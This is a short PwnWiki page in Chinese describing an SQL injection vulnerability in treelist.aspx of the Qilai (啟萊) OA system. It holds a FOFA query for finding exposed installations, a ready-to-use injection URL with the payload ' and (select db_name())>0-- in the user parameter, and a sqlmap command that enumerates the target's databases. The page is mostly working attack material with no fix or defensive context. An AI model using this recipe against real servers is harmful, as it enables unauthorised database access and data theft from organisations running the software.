啟萊OA treelist.aspx SQL注入漏洞

From PwnWiki

Revision as of 09:31, 21 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="启莱OA" </pre> 存在SQL注入的文件為 treelist.aspx <pre> http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1 </pre...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

app="启莱OA"

存在SQL注入的文件為 treelist.aspx

http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1

SQLMAP

sqlmap -u "http://xxx.xxx.xxx.xxx/client/treelist.aspx?user=' and (select db_name())>0--&pwd=1" -p users --dbs

Retrieved from "https://pwnwiki.com/index.php?title=啟萊OA_treelist.aspx_SQL注入漏洞&oldid=3003"